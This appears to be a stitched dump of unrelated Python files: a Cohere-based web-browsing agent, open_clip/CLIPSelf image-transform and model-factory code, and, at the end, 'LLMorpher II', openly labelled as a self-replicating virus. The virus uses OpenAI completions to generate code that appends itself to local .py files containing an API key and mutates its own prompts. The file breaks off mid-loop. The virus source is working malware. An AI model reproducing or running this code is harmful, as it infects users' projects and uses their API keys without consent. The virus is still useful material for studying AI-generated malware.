if self._step not in [DialogueState.Action, DialogueState.ActionFeedback]:
return
state = self._construct_state(self.objective, url, self._pruned_prioritized_elements, self.previous_commands)
examples = self.gather_examples(state)
prompt = self._construct_prompt(state, examples)
if self._step == DialogueState.Action:
action = " click"
if any(y in x for y in TYPEABLE for x in page_elements):
elements = list(
filter(lambda x: any(x.startswith(y) for y in CLICKABLE + TYPEABLE),
self._pruned_prioritized_elements))
state, prompt = self._shorten_prompt(self.objective,
url,
elements,
self.previous_commands,
examples,
target=MAX_SEQ_LEN)
action = self.choose(prompt + "{action}", [
{
"action": " click",
},
{
"action": " type",
},
], topk=2)
# if the model is confident enough, just assume the suggested action is correct
if (action[0][0] - action[1][0]) / -action[1][0] > 1.:
action = action[0][1]["action"]
else:
action = action[0][1]["action"]
self._action = action
self._step = DialogueState.ActionFeedback
return Prompt(eval(f'f"""{user_prompt_1}"""'))
self._action = action
self._step = DialogueState.Command
elif self._step == DialogueState.ActionFeedback:
if response == "y":
pass
elif response == "n":
if "click" in self._action:
self._action = " type"
elif "type" in self._action:
self._action = " click"
elif response == "examples":
examples = "\n".join(examples)
return Prompt(f"Examples:\n{examples}\n\n"
"Please respond with 'y' or 'n'")
elif re.match(r'search (.+)', response):
query = re.match(r'search (.+)', response).group(1)
results = search(self.co, query, self._page_elements, topk=50)
return Prompt(f"Query: {query}\nResults:\n{results}\n\n"
"Please respond with 'y' or 'n'")
else:
return Prompt("Please respond with 'y' or 'n'")
self._step = DialogueState.Command
def _get_cmd_prediction(self, prompt: str, chosen_element: str) -> str:
if "type" in self._action:
text = None
while text is None:
try:
num_tokens = 20
if len(self.co.tokenize(prompt)) > 2048 - num_tokens:
print(f"WARNING: truncating sequence of length {len(self.co.tokenize(prompt))}")
prompt = truncate_left(self.co.tokenize,
prompt,
self._action,
chosen_element,
limit=2048 - num_tokens)
print(len(self.co.tokenize(prompt + self._action + chosen_element)))
text = max(self.co.generate(prompt=prompt + self._action + chosen_element,
model=MODEL,
temperature=0.5,
num_generations=5,
max_tokens=num_tokens,
stop_sequences=["\n"],
return_likelihoods="GENERATION").generations,
key=lambda x: x.likelihood).text
except cohere.error.CohereError as e:
print(f"Cohere fucked up: {e}")
continue
else:
text = ""
return (self._action + chosen_element + text).strip()
def generate_command(self, url: str, pruned_elements: List[str], response: str = None):
state = self._construct_state(self.objective, url, pruned_elements, self.previous_commands)
examples = self.gather_examples(state)
prompt = self._construct_prompt(state, examples)
if self._step == DialogueState.Command:
if len(pruned_elements) == 1:
chosen_element = " " + " ".join(pruned_elements[0].split(" ")[:2])
self._chosen_elements = [{"id": chosen_element}]
else:
state = self._construct_state(self.objective, url, ["$elements"], self.previous_commands)
prompt = self._construct_prompt(state, examples)
state, prompt = self._shorten_prompt(self.objective, url, ["$elements"], self.previous_commands,
examples, self._action)
group_size = 20
self._chosen_elements = self.choose_element(
prompt + self._action + "{id}",
list(map(lambda x: {
"id": " " + " ".join(x.split(" ")[:2]),
"elements": x
}, pruned_elements)),
group_size,
topk=5)
chosen_element = self._chosen_elements[0]["id"]
state = self._construct_state(self.objective, url, pruned_elements, self.previous_commands)
prompt = self._construct_prompt(state, examples)
state, prompt = self._shorten_prompt(self.objective, url, pruned_elements, self.previous_commands,
examples, self._action, chosen_element)
cmd = self._get_cmd_prediction(prompt, chosen_element)
self._cmd = cmd
self._step = DialogueState.CommandFeedback
other_options = "\n".join(
f"\t({i+2}){self._action}{x['id']}" for i, x in enumerate(self._chosen_elements[1:]))
return Prompt(eval(f'f"""{user_prompt_2}"""'))
elif self._step == DialogueState.CommandFeedback:
if response == "examples":
examples = "\n".join(examples)
return Prompt(f"Examples:\n{examples}\n\n"
"Please respond with 'y' or 's'")
elif response == "prompt":
chosen_element = self._chosen_elements[0]["id"]
state, prompt = self._shorten_prompt(self.objective, url, pruned_elements, self.previous_commands,
examples, self._action, chosen_element)
return Prompt(f"{prompt}\n\nPlease respond with 'y' or 's'")
elif response == "recrawl":
return Prompt(eval(f'f"""{user_prompt_3}"""'))
elif response == "elements":
return Prompt("\n".join(str(d) for d in self._chosen_elements))
elif re.match(r'search (.+)', response):
query = re.match(r'search (.+)', response).group(1)
results = search(self.co, query, self._page_elements, topk=50)
return Prompt(f"Query: {query}\nResults:\n{results}\n\n"
"Please respond with 'y' or 'n'")
if re.match(r'\d+', response):
chosen_element = self._chosen_elements[int(response) - 1]["id"]
state, prompt = self._shorten_prompt(self.objective, url, pruned_elements, self.previous_commands,
examples, self._action, chosen_element)
self._cmd = self._get_cmd_prediction(prompt, chosen_element)
if "type" in self._action:
return Prompt(eval(f'f"""{user_prompt_3}"""'))
elif response != "y" and response != "s":
self._cmd = response
cmd_pattern = r"(click|type) (link|button|input|select) [\d]+( \"\w+\")?"
if not re.match(cmd_pattern, self._cmd):
return Prompt(f"Invalid command '{self._cmd}'. Must match regex '{cmd_pattern}'. Try again...")
if response == "s":
self._save_example(objective=self.objective,
url=url,
elements=self._prioritized_elements,
command=self._cmd,
previous_commands=self.previous_commands)
self.moments.append((url, self._prioritized_elements, self._cmd, self.previous_commands.copy()))
self.previous_commands.append(self._cmd)
cmd = Command(self._cmd.strip())
self.reset_state()
return cmd
def step(self, url: str, page_elements: List[str], response: str = None) -> Union[Prompt, Command]:
if self._error is not None:
if response == "c":
self._error = None
elif response == "success":
self.success()
raise self._error from None
elif response == "cancel":
raise self._error from None
else:
return Prompt("Response not recognized"
"\nPlease choose one of the following:"
"\n\t(c) ignore exception and continue" + user_prompt_end)
try:
self._step = DialogueState.Action if self._step == DialogueState.Unset else self._step
self._page_elements = page_elements
if self._prioritized_elements is None or self._prioritized_elements_hash != hash(frozenset(page_elements)):
self._generate_prioritization(page_elements, url)
self.user_responses[response] += 1
self._construct_responses()
action_or_prompt = self.pick_action(url, page_elements, response)
if isinstance(action_or_prompt, Prompt):
return action_or_prompt
if "click" in self._action:
pruned_elements = list(
filter(lambda x: any(x.startswith(y) for y in CLICKABLE), self._pruned_prioritized_elements))
elif "type" in self._action:
pruned_elements = list(
filter(lambda x: any(x.startswith(y) for y in TYPEABLE), self._pruned_prioritized_elements))
return self.generate_command(url, pruned_elements, response)
except Exception as e:
self._error = e
return Prompt(f"Caught exception:\n{e}"
"\nPlease choose one of the following:"
"\n\t(c) ignore exception and continue" + user_prompt_end)
| [
"\n\n",
"\n",
"1",
"Objective: $objective\nCurrent URL: $url\nCurrent Browser Content:\n------------------\n$browser_content\n------------------\nPrevious actions:\n$previous_commands",
"$examples\n---\nHere are the most relevant elements on the webpage (links, buttons, selects and inputs) to achieve the objective below:\nObjective: $objective\nURL: $url\nRelevant elements:\n{element}",
"elements",
"Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}\n\nSuggested command: {self._cmd}.\n\t(y) accept and continue\n\t(s) save example, accept, and continue\n\t(back) choose a different action\n\t(enter a new command) type your own command to replace the model's suggestionPLACEHOLDER",
"Given web state:\n{state}\n\nI have to choose between `clicking` and `typing` here.\n**I think I should{action}**\n\t(y) proceed with this action\n\t(n) do the other actionPLACEHOLDER",
"Given:\n (1) an objective that you are trying to achieve\n (2) the URL of your current web page\n (3) a simplified text description of what's visible in the browser window\n\nYour commands are:\n click X - click on element X.\n type X \"TEXT\" - type the specified text into input X\n\nHere are some examples:\n\n$examples\n\nPresent state:\n$state\nNext Command:",
"\n\t(success) the goal is accomplished\n\t(cancel) terminate the session\nType a choice and then press enter:",
"Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}\n\nSuggested command: {cmd}.\n\t(y) accept and continue\n\t(s) save example, accept, and continue\n{other_options}\n\t(back) choose a different action\n\t(enter a new command) type your own command to replace the model's suggestionPLACEHOLDER"
] |
2024-01-10 | wusize/CLIPSelf | src~open_clip~transform.py | import warnings
from dataclasses import dataclass, asdict
from typing import Any, Dict, Optional, Sequence, Tuple, Union
import torch
import torch.nn as nn
import torchvision.transforms.functional as F
from torchvision.transforms import Normalize, Compose, RandomResizedCrop, InterpolationMode, ToTensor, Resize, \
CenterCrop
from .constants import OPENAI_DATASET_MEAN, OPENAI_DATASET_STD
@dataclass
class AugmentationCfg:
scale: Tuple[float, float] = (0.9, 1.0)
ratio: Optional[Tuple[float, float]] = None
color_jitter: Optional[Union[float, Tuple[float, float, float]]] = None
interpolation: Optional[str] = None
re_prob: Optional[float] = None
re_count: Optional[int] = None
use_timm: bool = False
class ResizeMaxSize(nn.Module):
def __init__(self, max_size, interpolation=InterpolationMode.BICUBIC, fn='max', fill=0):
super().__init__()
if not isinstance(max_size, int):
raise TypeError(f"Size should be int. Got {type(max_size)}")
self.max_size = max_size
self.interpolation = interpolation
self.fn = min if fn == 'min' else min
self.fill = fill
def forward(self, img):
if isinstance(img, torch.Tensor):
height, width = img.shape[:2]
else:
width, height = img.size
scale = self.max_size / float(max(height, width))
new_size = tuple(round(dim * scale) for dim in (height, width))
img = F.resize(img, new_size, self.interpolation)
pad_h = self.max_size - new_size[0]
pad_w = self.max_size - new_size[1]
img = F.pad(img, padding=[pad_w // 2, pad_h // 2, pad_w - pad_w // 2, pad_h - pad_h // 2], fill=self.fill)
return img
def _convert_to_rgb(image):
return image.convert('RGB')
def image_transform(
image_size: int,
is_train: bool,
mean: Optional[Tuple[float, ...]] = None,
std: Optional[Tuple[float, ...]] = None,
resize_longest_max: bool = False,
fill_color: int = 0,
aug_cfg: Optional[Union[Dict[str, Any], AugmentationCfg]] = None,
):
mean = mean or OPENAI_DATASET_MEAN
if not isinstance(mean, (list, tuple)):
mean = (mean,) * 3
std = std or OPENAI_DATASET_STD
if not isinstance(std, (list, tuple)):
std = (std,) * 3
if isinstance(image_size, (list, tuple)) and image_size[0] == image_size[1]:
# for square size, pass size as int so that Resize() uses aspect preserving shortest edge
image_size = image_size[0]
if isinstance(aug_cfg, dict):
aug_cfg = AugmentationCfg(**aug_cfg)
else:
aug_cfg = aug_cfg or AugmentationCfg()
normalize = Normalize(mean=mean, std=std)
if is_train:
aug_cfg_dict = {k: v for k, v in asdict(aug_cfg).items() if v is not None}
use_timm = aug_cfg_dict.pop('use_timm', False)
if use_timm:
from timm.data import create_transform # timm can still be optional
if isinstance(image_size, (tuple, list)):
assert len(image_size) >= 2
input_size = (3,) + image_size[-2:]
else:
input_size = (3, image_size, image_size)
# by default, timm aug randomly alternates bicubic & bilinear for better robustness at inference time
aug_cfg_dict.setdefault('interpolation', 'random')
aug_cfg_dict.setdefault('color_jitter', None) # disable by default
train_transform = create_transform(
input_size=input_size,
is_training=True,
hflip=0.,
mean=mean,
std=std,
re_mode='pixel',
**aug_cfg_dict,
)
else:
train_transform = Compose([
RandomResizedCrop(
image_size,
scale=aug_cfg_dict.pop('scale'),
interpolation=InterpolationMode.BICUBIC,
),
_convert_to_rgb,
ToTensor(),
normalize,
])
if aug_cfg_dict:
warnings.warn(f'Unused augmentation cfg items, specify `use_timm` to use ({list(aug_cfg_dict.keys())}).')
return train_transform
else:
if resize_longest_max:
transforms = [
ResizeMaxSize(image_size, fill=fill_color)
]
else:
transforms = [
Resize(image_size, interpolation=InterpolationMode.BICUBIC),
CenterCrop(image_size),
]
transforms.extend([
_convert_to_rgb,
ToTensor(),
normalize,
])
return Compose(transforms)
def det_image_transform(
image_size: int,
is_train: bool,
mean: Optional[Tuple[float, ...]] = None,
std: Optional[Tuple[float, ...]] = None,
fill_color: int = 0,
aug_cfg: Optional[Union[Dict[str, Any], AugmentationCfg]] = None,
):
mean = mean or OPENAI_DATASET_MEAN
if not isinstance(mean, (list, tuple)):
mean = (mean,) * 3
std = std or OPENAI_DATASET_STD
if not isinstance(std, (list, tuple)):
std = (std,) * 3
if isinstance(image_size, (list, tuple)) and image_size[0] == image_size[1]:
# for square size, pass size as int so that Resize() uses aspect preserving shortest edge
image_size = image_size[0]
normalize = Normalize(mean=mean, std=std)
if is_train:
raise NotImplementedError
else:
transforms = [
ResizeLongest(image_size, fill=fill_color),
_convert_to_rgb,
ToTensor(),
normalize,
]
return Compose(transforms)
class ResizeLongest(nn.Module):
def __init__(self, max_size, interpolation=InterpolationMode.BICUBIC, fill=0):
super().__init__()
if not isinstance(max_size, int):
raise TypeError(f"Size should be int. Got {type(max_size)}")
self.max_size = max_size
self.interpolation = interpolation
self.fill = fill
def forward(self, img):
if isinstance(img, torch.Tensor):
height, width = img.shape[1:]
else:
width, height = img.size
scale = self.max_size / float(max(height, width))
new_height, new_width = round(height * scale), round(width * scale)
img = F.resize(img, [new_height, new_width], self.interpolation)
pad_h = self.max_size - new_height
pad_w = self.max_size - new_width
img = F.pad(img, padding=[0, 0, pad_w, pad_h], fill=self.fill)
return img
def get_scale(img, new_image):
if isinstance(img, torch.Tensor):
height, width = new_image.shape[-2:]
else:
width, height = img.size
if isinstance(new_image, torch.Tensor):
new_height, new_width = new_image.shape[-2:]
else:
new_width, new_height = new_image.size
scale = min(new_height/height, new_width/width)
return scale
| [] |
2024-01-10 | wusize/CLIPSelf | src~open_clip~factory.py | import json
import logging
import os
import pathlib
import re
from copy import deepcopy
from pathlib import Path
from typing import Any, Dict, Optional, Tuple, Union
import torch
from .constants import OPENAI_DATASET_MEAN, OPENAI_DATASET_STD
from .model import CLIP, CustomTextCLIP, convert_weights_to_lp, convert_to_custom_text_state_dict,\
resize_pos_embed, get_cast_dtype
from .coca_model import CoCa
from .loss import ClipLoss, DistillClipLoss, CoCaLoss
from .openai import load_openai_model
from .pretrained import is_pretrained_cfg, get_pretrained_cfg, \
download_pretrained, list_pretrained_tags_by_model, download_pretrained_from_hf
from .transform import image_transform, AugmentationCfg, det_image_transform
from .tokenizer import HFTokenizer, tokenize
from open_clip import eva_clip
HF_HUB_PREFIX = 'hf-hub:'
_MODEL_CONFIG_PATHS = [Path(__file__).parent / f"model_configs/"]
_MODEL_CONFIGS = {} # directory (model_name: config) of model architecture configs
def _natural_key(string_):
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_.lower())]
def _rescan_model_configs():
global _MODEL_CONFIGS
config_ext = ('.json',)
config_files = []
for config_path in _MODEL_CONFIG_PATHS:
if config_path.is_file() and config_path.suffix in config_ext:
config_files.append(config_path)
elif config_path.is_dir():
for ext in config_ext:
config_files.extend(config_path.glob(f'*{ext}'))
for cf in config_files:
with open(cf, 'r') as f:
model_cfg = json.load(f)
if all(a in model_cfg for a in ('embed_dim', 'vision_cfg', 'text_cfg')):
_MODEL_CONFIGS[cf.stem] = model_cfg
_MODEL_CONFIGS = {k: v for k, v in sorted(_MODEL_CONFIGS.items(), key=lambda x: _natural_key(x[0]))}
_rescan_model_configs() # initial populate of model config registry
def list_models():
""" enumerate available model architectures based on config files """
return list(_MODEL_CONFIGS.keys())
def add_model_config(path):
""" add model config path or file and update registry """
if not isinstance(path, Path):
path = Path(path)
_MODEL_CONFIG_PATHS.append(path)
_rescan_model_configs()
def get_model_config(model_name):
if model_name in _MODEL_CONFIGS:
return deepcopy(_MODEL_CONFIGS[model_name])
else:
return None
def get_tokenizer(model_name):
if 'EVA' in model_name:
from open_clip import eva_clip
return eva_clip.get_tokenizer(model_name)
if model_name.startswith(HF_HUB_PREFIX):
tokenizer = HFTokenizer(model_name[len(HF_HUB_PREFIX):])
else:
config = get_model_config(model_name)
tokenizer = HFTokenizer(
config['text_cfg']['hf_tokenizer_name']) if 'hf_tokenizer_name' in config['text_cfg'] else tokenize
return tokenizer
def load_state_dict(checkpoint_path: str, map_location='cpu'):
checkpoint = torch.load(checkpoint_path, map_location=map_location)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
state_dict = checkpoint['state_dict']
else:
state_dict = checkpoint
if next(iter(state_dict.items()))[0].startswith('module'):
state_dict = {k[7:]: v for k, v in state_dict.items()}
return state_dict
def load_checkpoint(model, checkpoint_path, strict=True):
state_dict = load_state_dict(checkpoint_path)
# detect old format and make compatible with new format
if 'positional_embedding' in state_dict and not hasattr(model, 'positional_embedding'):
state_dict = convert_to_custom_text_state_dict(state_dict)
resize_pos_embed(state_dict, model)
incompatible_keys = model.load_state_dict(state_dict, strict=strict)
return incompatible_keys
def create_model(
model_name: str,
pretrained: Optional[str] = None,
precision: str = 'fp32',
device: Union[str, torch.device] = 'cpu',
jit: bool = False,
force_quick_gelu: bool = False,
force_custom_text: bool = False,
force_patch_dropout: Optional[float] = None,
force_image_size: Optional[Union[int, Tuple[int, int]]] = None,
pretrained_image: bool = False,
pretrained_hf: bool = True,
cache_dir: Optional[str] = None,
output_dict: Optional[bool] = None,
require_pretrained: bool = False,
):
has_hf_hub_prefix = model_name.startswith(HF_HUB_PREFIX)
if has_hf_hub_prefix:
model_id = model_name[len(HF_HUB_PREFIX):]
checkpoint_path = download_pretrained_from_hf(model_id, cache_dir=cache_dir)
config_path = download_pretrained_from_hf(model_id, filename='open_clip_config.json', cache_dir=cache_dir)
with open(config_path, 'r', encoding='utf-8') as f:
config = json.load(f)
pretrained_cfg = config['preprocess_cfg']
model_cfg = config['model_cfg']
else:
model_name = model_name.replace('/', '-') # for callers using old naming with / in ViT names
checkpoint_path = None
pretrained_cfg = {}
model_cfg = None
if isinstance(device, str):
device = torch.device(device)
if pretrained == 'eva':
return eva_clip.create_model(model_name=model_name,
pretrained=cache_dir, force_custom_clip=True,
precision=precision,
device=device,)
if pretrained and pretrained.lower() == 'openai':
logging.info(f'Loading pretrained {model_name} from OpenAI.')
model = load_openai_model(
model_name,
precision=precision,
device=device,
jit=jit,
cache_dir=cache_dir,
)
# to always output dict even if it is clip
if output_dict and hasattr(model, "output_dict"):
model.output_dict = True
else:
model_cfg = model_cfg or get_model_config(model_name)
if model_cfg is not None:
logging.info(f'Loaded {model_name} model config.')
else:
logging.error(f'Model config for {model_name} not found; available models {list_models()}.')
raise RuntimeError(f'Model config for {model_name} not found.')
if force_quick_gelu:
# override for use of QuickGELU on non-OpenAI transformer models
model_cfg["quick_gelu"] = True
if force_patch_dropout is not None:
# override the default patch dropout value
model_cfg["vision_cfg"]["patch_dropout"] = force_patch_dropout
if force_image_size is not None:
# override model config's image size
model_cfg["vision_cfg"]["image_size"] = force_image_size
if pretrained_image:
if 'timm_model_name' in model_cfg.get('vision_cfg', {}):
# pretrained weight loading for timm models set via vision_cfg
model_cfg['vision_cfg']['timm_model_pretrained'] = True
else:
assert False, 'pretrained image towers currently only supported for timm models'
cast_dtype = get_cast_dtype(precision)
is_hf_model = 'hf_model_name' in model_cfg.get('text_cfg', {})
custom_text = model_cfg.pop('custom_text', False) or force_custom_text or is_hf_model
if custom_text:
if is_hf_model:
model_cfg['text_cfg']['hf_model_pretrained'] = pretrained_hf
if "coca" in model_name:
model = CoCa(**model_cfg, cast_dtype=cast_dtype)
else:
model = CustomTextCLIP(**model_cfg, cast_dtype=cast_dtype)
else:
model = CLIP(**model_cfg, cast_dtype=cast_dtype)
pretrained_loaded = False
if pretrained:
checkpoint_path = ''
pretrained_cfg = get_pretrained_cfg(model_name, pretrained)
if pretrained_cfg:
checkpoint_path = download_pretrained(pretrained_cfg, cache_dir=cache_dir)
elif os.path.exists(pretrained):
checkpoint_path = pretrained
if checkpoint_path:
print(f'Loading pretrained {model_name} weights ({pretrained}).', flush=True)
logging.info(f'Loading pretrained {model_name} weights ({pretrained}).')
load_checkpoint(model, checkpoint_path)
else:
error_str = (
f'Pretrained weights ({pretrained}) not found for model {model_name}.'
f'Available pretrained tags ({list_pretrained_tags_by_model(model_name)}.')
logging.warning(error_str)
raise RuntimeError(error_str)
pretrained_loaded = True
elif has_hf_hub_prefix:
logging.info(f'Loading pretrained {model_name} weights ({pretrained}).')
load_checkpoint(model, checkpoint_path)
pretrained_loaded = True
if require_pretrained and not pretrained_loaded:
# callers of create_model_from_pretrained always expect pretrained weights
raise RuntimeError(
f'Pretrained weights were required for (model: {model_name}, pretrained: {pretrained}) but not loaded.')
model.to(device=device)
if precision in ("fp16", "bf16"):
convert_weights_to_lp(model, dtype=torch.bfloat16 if precision == 'bf16' else torch.float16)
# set image / mean metadata from pretrained_cfg if available, or use default
model.visual.image_mean = pretrained_cfg.get('mean', None) or OPENAI_DATASET_MEAN
model.visual.image_std = pretrained_cfg.get('std', None) or OPENAI_DATASET_STD
# to always output dict even if it is clip
if output_dict and hasattr(model, "output_dict"):
model.output_dict = True
if jit:
model = torch.jit.script(model)
return model
def create_loss(args):
if args.dataset_type in ["sanity_check", "clipself", "clipself_proposals", "coco_caption"]:
LossType = ClipLoss
else:
LossType = DistillClipLoss
return LossType(
local_loss=True,
gather_with_grad=True, # use gather with grad
cache_labels=True,
rank=args.rank,
world_size=args.world_size,
use_horovod=args.horovod,
)
def create_model_and_transforms(
model_name: str,
pretrained: Optional[str] = None,
precision: str = 'fp32',
device: Union[str, torch.device] = 'cpu',
jit: bool = False,
force_quick_gelu: bool = False,
force_custom_text: bool = False,
force_patch_dropout: Optional[float] = None,
force_image_size: Optional[Union[int, Tuple[int, int]]] = None,
pretrained_image: bool = False,
pretrained_hf: bool = True,
image_mean: Optional[Tuple[float, ...]] = None,
image_std: Optional[Tuple[float, ...]] = None,
aug_cfg: Optional[Union[Dict[str, Any], AugmentationCfg]] = None,
cache_dir: Optional[str] = None,
output_dict: Optional[bool] = None,
det_image_size=1024,
dataset_type=None
):
model = create_model(
model_name,
pretrained,
precision=precision,
device=device,
jit=jit,
force_quick_gelu=force_quick_gelu,
force_custom_text=force_custom_text,
force_patch_dropout=force_patch_dropout,
force_image_size=force_image_size,
pretrained_image=pretrained_image,
pretrained_hf=pretrained_hf,
cache_dir=cache_dir,
output_dict=output_dict,
)
image_mean = image_mean or getattr(model.visual, 'image_mean', None)
image_std = image_std or getattr(model.visual, 'image_std', None)
# preprocess_train = image_transform(
# model.visual.image_size,
# is_train=True,
# mean=image_mean,
# std=image_std,
# aug_cfg=aug_cfg,
# )
preprocess_val_det = det_image_transform(
det_image_size,
is_train=False,
mean=image_mean,
std=image_std,
)
preprocess_val_img = image_transform(
model.visual.image_size,
is_train=False,
mean=image_mean,
std=image_std,
resize_longest_max=True,
)
if dataset_type == "sanity_check":
preprocess_train = image_transform(
det_image_size,
is_train=True,
mean=image_mean,
std=image_std,
aug_cfg=aug_cfg)
elif dataset_type is not None:
preprocess_train = [preprocess_val_det, preprocess_val_img] \
if 'distill' in dataset_type or dataset_type == 'region_clip'\
or dataset_type in ['clipself', 'clipself_proposals', "coop"] \
else image_transform(model.visual.image_size,
is_train=True,
mean=image_mean,
std=image_std,
aug_cfg=aug_cfg)
else:
preprocess_train = image_transform(
model.visual.image_size,
is_train=True,
mean=image_mean,
std=image_std,
aug_cfg=aug_cfg)
return model, preprocess_train, [preprocess_val_det, preprocess_val_img]
def create_model_from_pretrained(
model_name: str,
pretrained: Optional[str] = None,
precision: str = 'fp32',
device: Union[str, torch.device] = 'cpu',
jit: bool = False,
force_quick_gelu: bool = False,
force_custom_text: bool = False,
force_image_size: Optional[Union[int, Tuple[int, int]]] = None,
return_transform: bool = True,
image_mean: Optional[Tuple[float, ...]] = None,
image_std: Optional[Tuple[float, ...]] = None,
cache_dir: Optional[str] = None,
):
model = create_model(
model_name,
pretrained,
precision=precision,
device=device,
jit=jit,
force_quick_gelu=force_quick_gelu,
force_custom_text=force_custom_text,
force_image_size=force_image_size,
cache_dir=cache_dir,
require_pretrained=True,
)
if not return_transform:
return model
image_mean = image_mean or getattr(model.visual, 'image_mean', None)
image_std = image_std or getattr(model.visual, 'image_std', None)
preprocess = image_transform(
model.visual.image_size,
is_train=False,
mean=image_mean,
std=image_std,
)
return model, preprocess
| [] |
2024-01-10 | tmpout/tmpout.github.io | 3~llmorpher-spth~LLMorpherII.py | import openai
# LLMorpher II by Second Part To Hell
# A new-age AI-based linguisto-morphic self-replicator, powered by OpenAIs GPT. Fully encodes and mutates the self-replicator into natural language.
#
# See my text for details: Using GPT to encode and mutate computer viruses entirely in natural language
#
# March 2023
# https://github.com/SPTHvx/SPTH
# [email protected]
# twitter: @SPTHvx
openai.api_key = "..." # Add your openai key here
prompts_list=[]
tofile_list=[]
prompts_list.append("Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it.")
prompts_list.append("Write a python function get_content which takes an input argument (string of a text file), reads the text file and returns its full file content. Do not write anything else except of the python code!")
prompts_list.append("Write a python function is_key, which takes a string as an input and return True, if it contains the substring 'openai.api_key' (which has 14 characters) exactly once, otherwise False. Be careful, do not compare the entire string, but find how often the substring is contained! Very important: Do not write anything else except of the python code, do not write print statements and do not define variables outside of the function. Just write the function!")
prompts_list.append("Write a python function write_to_file which takes a filename and a string as an input, and append one line break (do not forget!) and the input string to the file. Output only the python code, nothing else!")
prompts_list.append("Write a loop over all elements returned by the function get_files (which has no arguments). For each element (lets call it curr_element), test whether the function is_key with the argument returned from get_content of the current element is True. If it is True, call the function write_to_file with curr_element as the first argument, and the variable tofile_str as the second argument. (tofile_str is a variable which is defined above)")
prompts_list.append("Write a python code (only this one line) which prints: 'LLMorphism II by SPTH - a new-age AI-based linguisto-morphic self-replicator, powered by OpenAIs GPT. Fully encodes and mutates the self-replicator into natural language.'.")
prompts_list.append("Write a python code (only this one line) which prints: 'Hugs to the valhalla gang - hh86, roy g biv, JPanic, herm1t!'.")
tofile_list.append("Write a python function return_text which takes two inputs: a prompt string, and the openai key (with a default value of the value openai.api_key). The function returns returns the output of an openai text completion (ONLY USE 3 parameters!). As parameters for the openai text completion use only four parameter (!!): engine which is 'text-davinci-003', max_tokens is 1000, temperature is 0.0, and the parameter prompt. Do not use any other parameters, only these four! The parameters are not strings!")
tofile_list.append("Write a python function modify_text, with two strings as input argument. Make a new string, which is the first, then a chr(34), then the second string, then a chr(34). Use the new string as an argument for a function call to return_text. The new modify_txt function should take the output string of return_text, remove all line breaks and all double quotation marks, and return this final string.")
tofile_list.append("Write the following python function comp_str_fct, which has one argument. The argument is a list of strings. For each element of the list, call the function return_text (with the current element as the argument), and take its return value (a string). The function should combine all strings (with a line break) and return it.")
tofile_list.append("Write one line in python, which defines a string with the name tofile_str. The value of the string is 'prompts_list=[]', with a line break before and afterwards.")
tofile_list.append("Write one line in python, which appends and store to the string with the name tofile_str. The appended value is 'tofile_list=[]', followed by a line break.")
tofile_list.append("Write one line in python, which defines the string called reform_str, and initialize it with the string (Keep the entire content the same. produce a syntactical correct python line!) 'Slightly reformulate in natural langauge the next sentence,'")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) ' without changing its meaning, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) ' do not interpret the content, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) 'keep the length and structure of the string as similar as possible, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) 'very importantly do not change the content at all, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same, keep the colon. produce a syntactical correct python line!) ' and only make slight modifications: '")
tofile_list.append("Write a python loop over all elements of the list prompts_list. For each element with 20% probability, replace the element with the return value of the function modify_text with two arguments: the variable reform_str and the current elements. You should indeed modify the elements in prompts_list. Assume that the list prompts_list, modify_text and reform_str are already defined, do not redefine any of them! Very important: Do not write anything except of the loop and the import of the random package.")
tofile_list.append("Write a python loop over all elements of the list tofile_list. For each element with 20% probability, replace the element with the return value of the function modify_text with two arguments: the variable reform_str and the current elements. You should indeed modify the elements in tofile_list. Assume that the list tofile_list, modify_text and reform_str are already defined, do not redefine any of them! Very important: Do not write anything except of the loop and the import of the random package.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called prompts_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'prompts_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called tofile_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'tofile_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a python code (only this one line) which defines a variable vic_code. The variable is generated by a function call of comp_str_fct with the argument being the variable called tofile_list.")
tofile_list.append("Write a python code, which appends to the string variable tofile_str a line break, and then the variable vic_code (these are two variable names, not strings themselves!). Store the result in the variable tofile_str.")
tofile_list.append("Write a python code (only this one line) which defines a variable complete_str. The variable is generated by a function call of comp_str_fct with the argument being the variable called prompts_list.")
tofile_list.append("Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it.")
def return_text(prompt):
completion = openai.Completion.create(
engine="text-davinci-003",
prompt=prompt,
max_tokens=1024,
temperature=0.0,
)
return completion.choices[0].text
def modify_text(string1, string2):
new_string = string1 + chr(34) + string2 + chr(34)
return return_text(new_string).replace('\n', '').replace('"', '')
def comp_str_fct(list_of_strings):
all_str=''
for ll in list_of_strings:
all_str+='\n'+return_text(ll)
return all_str
tofile_str = '\nprompts_list=[]\n'
tofile_str += 'tofile_list=[]\n'
reform_str = 'Slightly reformulate in natural langauge the next sentence,'
reform_str += ' without changing its meaning, '
reform_str += ' do not interpret the content, '
reform_str += 'keep the length and structure of the string as similar as possible, '
reform_str += 'very importantly do not change the content at all, '
reform_str += ' and only make slight modifications: '
import random
for i in range(len(prompts_list)):
if random.random() < 0.2:
prompts_list[i] = modify_text(reform_str, prompts_list[i])
import random
for i in range(len(tofile_list)):
if random.random() < 0.2:
tofile_list[i] = modify_text(reform_str, tofile_list[i])
for element in prompts_list:
tofile_str += 'prompts_list.append("{}")\n'.format(element)
for l in tofile_list:
